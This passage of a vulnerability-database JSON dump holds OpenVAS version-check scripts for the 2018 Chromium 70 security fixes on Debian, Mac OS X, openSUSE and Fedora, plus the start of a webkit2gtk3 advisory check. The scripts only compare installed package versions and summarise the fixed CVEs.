script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4330.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"chromium-browser on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 70.0.3538.67-1~deb9u1.\n\nWe recommend that you upgrade your chromium-browser packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/chromium-browser\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities have been discovered in the chromium web browser.\n\nCVE-2018-5179\nYannic Boneberger discovered an error in the ServiceWorker implementation.\n\nCVE-2018-17462\nNed Williamson and Niklas Baumstark discovered a way to escape the sandbox.\n\nCVE-2018-17463\nNed Williamson and Niklas Baumstark discovered a remote code execution\nissue in the v8 javascript library.\n\nCVE-2018-17464\nxisigr discovered a URL spoofing issue.\n\nCVE-2018-17465\nLin Zuojian discovered a use-after-free issue in the v8 javascript\nlibrary.\n\nCVE-2018-17466\nOmair discovered a memory corruption issue in the angle library.\n\nCVE-2018-17467\nKhalil Zhani discovered a URL spoofing issue.\n\nCVE-2018-17468\nJams Lee discovered an information disclosure issue.\n\nCVE-2018-17469\nZhen Zhou discovered a buffer overflow issue in the pdfium library.\n\nCVE-2018-17470\nZhe Jin discovered a memory corruption issue in the GPU backend\nimplementation.\n\nCVE-2018-17471\nLnyas Zhang discovered an issue with the full screen user interface.\n\nCVE-2018-17473\nKhalil Zhani discovered a URL spoofing issue.\n\nCVE-2018-17474\nZhe Jin discovered a use-after-free issue.\n\nCVE-2018-17475\nVladimir Metnew discovered a URL spoofing issue.\n\nCVE-2018-17476\nKhalil Zhani discovered an issue with the full screen user interface.\n\nCVE-2018-17477\nAaron Muir Hamilton discovered a user interface spoofing issue in the\nextensions pane.\n\nThis update also fixes a buffer overflow in the embedded lcms library included\nwith chromium.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"chromedriver\", ver:\"70.0.3538.67-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium\", ver:\"70.0.3538.67-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-driver\", ver:\"70.0.3538.67-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-l10n\", ver:\"70.0.3538.67-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-shell\", ver:\"70.0.3538.67-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"chromium-widevine\", ver:\"70.0.3538.67-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T21:52:56", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2018-10-17T00:00:00", "type": "openvas", "title": "Google Chrome Security Updates(stable-channel-update-for-desktop-2018-10)-Mac OS X", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17464", "CVE-2018-17470", "CVE-2018-17467", "CVE-2018-17471", "CVE-2018-5179", "CVE-2018-17466", "CVE-2018-17474", "CVE-2018-17465", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17473", "CVE-2018-17463", "CVE-2018-17477", "CVE-2018-17469", "CVE-2018-17462", "CVE-2018-17468"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310814096", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814096", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Security Updates(stable-channel-update-for-desktop-2018-10)-Mac OS X\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814096\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2018-5179\", \"CVE-2018-17477\", \"CVE-2018-17476\", \"CVE-2018-17475\",\n \"CVE-2018-17474\", \"CVE-2018-17473\", \"CVE-2018-17462\", \"CVE-2018-17471\",\n \"CVE-2018-17470\", \"CVE-2018-17469\", \"CVE-2018-17468\", \"CVE-2018-17467\",\n \"CVE-2018-17466\", \"CVE-2018-17465\", \"CVE-2018-17464\", \"CVE-2018-17463\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-10-17 11:15:41 +0530 (Wed, 17 Oct 2018)\");\n script_name(\"Google Chrome Security Updates(stable-channel-update-for-desktop-2018-10)-Mac OS X\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - Sandbox escape in AppCache.\n\n - An input validation error in V8.\n\n - Heap buffer overflow error in Little CMS in PDFium.\n\n - Multiple URL and UI spoofing errors in Omnibox and Extensions.\n\n - Multiple memory corruption errors in Angle and GPU Internals.\n\n - Multiple use after free errors in V8 and Blink.\n\n - Lack of limits on 'update' function in ServiceWorker.\n\n - Security UI occlusion in full screen mode.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attackers\n to bypass security restrictions, execute arbitrary code, conduct spoofing attack\n and cause denial of service condition.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to 70.0.3538.67 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version 70.0.3538.67\n or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://chromereleases.googleblog.com/2018/10/stable-channel-update-for-desktop.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"GoogleChrome/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nchr_ver = infos['version'];\nchr_path = infos['location'];\n\nif(version_is_less(version:chr_ver, test_version:\"70.0.3538.67\"))\n{\n report = report_fixed_ver(installed_version:chr_ver, fixed_version:\"70.0.3538.67\", install_path:chr_path);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T17:34:00", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-10-25T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for Chromium (openSUSE-SU-2018:3396-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17464", "CVE-2018-17470", "CVE-2018-17467", "CVE-2018-17472", "CVE-2018-17471", "CVE-2018-5179", "CVE-2018-17466", "CVE-2018-17474", "CVE-2018-17465", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17473", "CVE-2018-17463", "CVE-2018-17477", "CVE-2018-17469", "CVE-2018-17462", "CVE-2018-17468"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851948", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851948", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851948\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-10-25 06:00:36 +0200 (Thu, 25 Oct 2018)\");\n script_cve_id(\"CVE-2018-17462\", \"CVE-2018-17463\", \"CVE-2018-17464\", \"CVE-2018-17465\", \"CVE-2018-17466\", \"CVE-2018-17467\", \"CVE-2018-17468\", \"CVE-2018-17469\", \"CVE-2018-17470\", \"CVE-2018-17471\", \"CVE-2018-17472\", \"CVE-2018-17473\", \"CVE-2018-17474\", \"CVE-2018-17475\", \"CVE-2018-17476\", \"CVE-2018-17477\", \"CVE-2018-5179\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for Chromium (openSUSE-SU-2018:3396-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Chromium'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for Chromium to version 70.0.3538.67 fixes multiple issues.\n\n Security issues fixed (bsc#1112111):\n\n - CVE-2018-17462: Sandbox escape in AppCache\n\n - CVE-2018-17463: Remote code execution in V8\n\n - Heap buffer overflow in Little CMS in PDFium\n\n - CVE-2018-17464: URL spoof in Omnibox\n\n - CVE-2018-17465: Use after free in V8\n\n - CVE-2018-17466: Memory corruption in Angle\n\n - CVE-2018-17467: URL spoof in Omnibox\n\n - CVE-2018-17468: Cross-origin URL disclosure in Blink\n\n - CVE-2018-17469: Heap buffer overflow in PDFium\n\n - CVE-2018-17470: Memory corruption in GPU Internals\n\n - CVE-2018-17471: Security UI occlusion in full screen mode\n\n - CVE-2018-17473: URL spoof in Omnibox\n\n - CVE-2018-17474: Use after free in Blink\n\n - CVE-2018-17475: URL spoof in Omnibox\n\n - CVE-2018-17476: Security UI occlusion in full screen mode\n\n - CVE-2018-5179: Lack of limits on update() in ServiceWorker\n\n - CVE-2018-17477: UI spoof in Extensions\n\n VAAPI hardware accelerated rendering is now enabled by default.\n\n This update contains the following packaging changes:\n\n - Use the system libusb-1.0 library\n\n - Use bundled harfbuzz library\n\n - Disable gnome-keyring to avoid crashes\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 42.3:\n\n zypper in -t patch openSUSE-2018-1253=1\");\n\n script_tag(name:\"affected\", value:\"Chromium on openSUSE Leap 42.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:3396-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-10/msg00062.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~70.0.3538.67~179.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver-debuginfo\", rpm:\"chromedriver-debuginfo~70.0.3538.67~179.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~70.0.3538.67~179.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debuginfo\", rpm:\"chromium-debuginfo~70.0.3538.67~179.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debugsource\", rpm:\"chromium-debugsource~70.0.3538.67~179.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T17:34:28", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-10-26T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for Chromium (openSUSE-SU-2018:3273-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17464", "CVE-2018-17470", "CVE-2018-17467", "CVE-2018-17472", "CVE-2018-17471", "CVE-2018-5179", "CVE-2018-17466", "CVE-2018-17474", "CVE-2018-17465", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17473", "CVE-2018-17463", "CVE-2018-17477", "CVE-2018-17469", "CVE-2018-17462", "CVE-2018-17468"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851995", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851995", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851995\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-17462\", \"CVE-2018-17463\", \"CVE-2018-17464\", \"CVE-2018-17465\", \"CVE-2018-17466\", \"CVE-2018-17467\", \"CVE-2018-17468\", \"CVE-2018-17469\", \"CVE-2018-17470\", \"CVE-2018-17471\", \"CVE-2018-17472\", \"CVE-2018-17473\", \"CVE-2018-17474\", \"CVE-2018-17475\", \"CVE-2018-17476\", \"CVE-2018-17477\", \"CVE-2018-5179\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-10-26 06:30:34 +0200 (Fri, 26 Oct 2018)\");\n script_name(\"openSUSE: Security Advisory for Chromium (openSUSE-SU-2018:3273-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:3273-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-10/msg00044.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'Chromium'\n package(s) announced via the openSUSE-SU-2018:3273-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for Chromium to version 70.0.3538.67 fixes multiple issues.\n\n Security issues fixed (bsc#1112111):\n\n - CVE-2018-17462: Sandbox escape in AppCache\n\n - CVE-2018-17463: Remote code execution in V8\n\n - Heap buffer overflow in Little CMS in PDFium\n\n - CVE-2018-17464: URL spoof in Omnibox\n\n - CVE-2018-17465: Use after free in V8\n\n - CVE-2018-17466: Memory corruption in Angle\n\n - CVE-2018-17467: URL spoof in Omnibox\n\n - CVE-2018-17468: Cross-origin URL disclosure in Blink\n\n - CVE-2018-17469: Heap buffer overflow in PDFium\n\n - CVE-2018-17470: Memory corruption in GPU Internals\n\n - CVE-2018-17471: Security UI occlusion in full screen mode\n\n - CVE-2018-17473: URL spoof in Omnibox\n\n - CVE-2018-17474: Use after free in Blink\n\n - CVE-2018-17475: URL spoof in Omnibox\n\n - CVE-2018-17476: Security UI occlusion in full screen mode\n\n - CVE-2018-5179: Lack of limits on update() in ServiceWorker\n\n - CVE-2018-17477: UI spoof in Extensions\n\n VAAPI hardware accelerated rendering is now enabled by default.\n\n This update contains the following packaging changes:\n\n - Use the system libusb-1.0 library\n\n - Use bundled harfbuzz library\n\n - Disable gnome-keyring to avoid crashes\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2018-1208=1\n\n - openSUSE Backports SLE-15:\n\n zypper in -t patch openSUSE-2018-1208=1\");\n\n script_tag(name:\"affected\", value:\"Chromium on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver\", rpm:\"chromedriver~70.0.3538.67~lp150.2.20.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromedriver-debuginfo\", rpm:\"chromedriver-debuginfo~70.0.3538.67~lp150.2.20.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~70.0.3538.67~lp150.2.20.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debuginfo\", rpm:\"chromium-debuginfo~70.0.3538.67~lp150.2.20.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium-debugsource\", rpm:\"chromium-debugsource~70.0.3538.67~lp150.2.20.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:18", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-05-07T00:00:00", "type": "openvas", "title": "Fedora Update for chromium FEDORA-2018-34f7f68029", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17464", "CVE-2018-17470", "CVE-2018-17467", "CVE-2018-17472", "CVE-2018-17471", "CVE-2018-5179", "CVE-2018-17466", "CVE-2018-17474", "CVE-2018-17465", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17473", "CVE-2018-17463", "CVE-2018-16435", "CVE-2018-17477", "CVE-2018-17469", "CVE-2018-17462", "CVE-2018-17468"], "modified": "2019-05-14T00:00:00", "id": "OPENVAS:1361412562310876138", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876138", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876138\");\n script_version(\"2019-05-14T05:04:40+0000\");\n script_cve_id(\"CVE-2018-16435\", \"CVE-2018-17462\", \"CVE-2018-17463\", \"CVE-2018-17464\", \"CVE-2018-17465\", \"CVE-2018-17466\", \"CVE-2018-17467\", \"CVE-2018-17468\", \"CVE-2018-17469\", \"CVE-2018-17470\", \"CVE-2018-17471\", \"CVE-2018-17473\", \"CVE-2018-17474\", \"CVE-2018-17475\", \"CVE-2018-17476\", \"CVE-2018-5179\", \"CVE-2018-17477\", \"CVE-2018-17472\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-14 05:04:40 +0000 (Tue, 14 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-07 02:36:12 +0000 (Tue, 07 May 2019)\");\n script_name(\"Fedora Update for chromium FEDORA-2018-34f7f68029\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC29\");\n\n script_xref(name:\"FEDORA\", value:\"2018-34f7f68029\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7KYL6GLSQ3DFIIUGOB2ARZJOC7JED6YW\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chromium'\n package(s) announced via the FEDORA-2018-34f7f68029 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Chromium is an open-source web browser, powered by WebKit (Blink).\");\n\n script_tag(name:\"affected\", value:\"'chromium' package(s) on Fedora 29.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC29\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"chromium\", rpm:\"chromium~70.0.3538.77~4.fc29\", rls:\"FC29\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T16:50:58", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-05-11T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2019:1374-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-8518", "CVE-2019-8503", "CVE-2019-11070", "CVE-2019-8523", "CVE-2019-8563", "CVE-2019-8506", "CVE-2019-8559", "CVE-2019-8558", "CVE-2019-8515", "CVE-2019-8551", "CVE-2019-6251", "CVE-2019-8544", "CVE-2019-6201", "CVE-2019-7285", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-7292", "CVE-2019-8524"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852488", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852488", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852488\");\n script_version(\"2020-01-31T08:04:39+0000\");\n script_cve_id(\"CVE-2019-11070\", \"CVE-2019-6201\", \"CVE-2019-6251\", \"CVE-2019-7285\",\n \"CVE-2019-7292\", \"CVE-2019-8503\", \"CVE-2019-8506\", \"CVE-2019-8515\",\n \"CVE-2019-8518\", \"CVE-2019-8523\", \"CVE-2019-8524\", \"CVE-2019-8535\",\n \"CVE-2019-8536\", \"CVE-2019-8544\", \"CVE-2019-8551\", \"CVE-2019-8558\",\n \"CVE-2019-8559\", \"CVE-2019-8563\");\n script_tag(name:\"cvss_base\", value:\"5.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:04:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-05-11 02:00:45 +0000 (Sat, 11 May 2019)\");\n script_name(\"openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2019:1374-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2019:1374-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2019-05/msg00025.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk3'\n package(s) announced via the openSUSE-SU-2019:1374-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for webkit2gtk3 to version 2.24.1 fixes the following issues:\n\n Security issues fixed:\n\n - CVE-2019-6201, CVE-2019-6251, CVE-2019-7285, CVE-2019-7292,\n CVE-2019-8503, CVE-2019-8506, CVE-2019-8515, CVE-2019-8518,\n CVE-2019-8523, CVE-2019-8524, CVE-2019-8535, CVE-2019-8536,\n CVE-2019-8544, CVE-2019-8551, CVE-2019-8558, 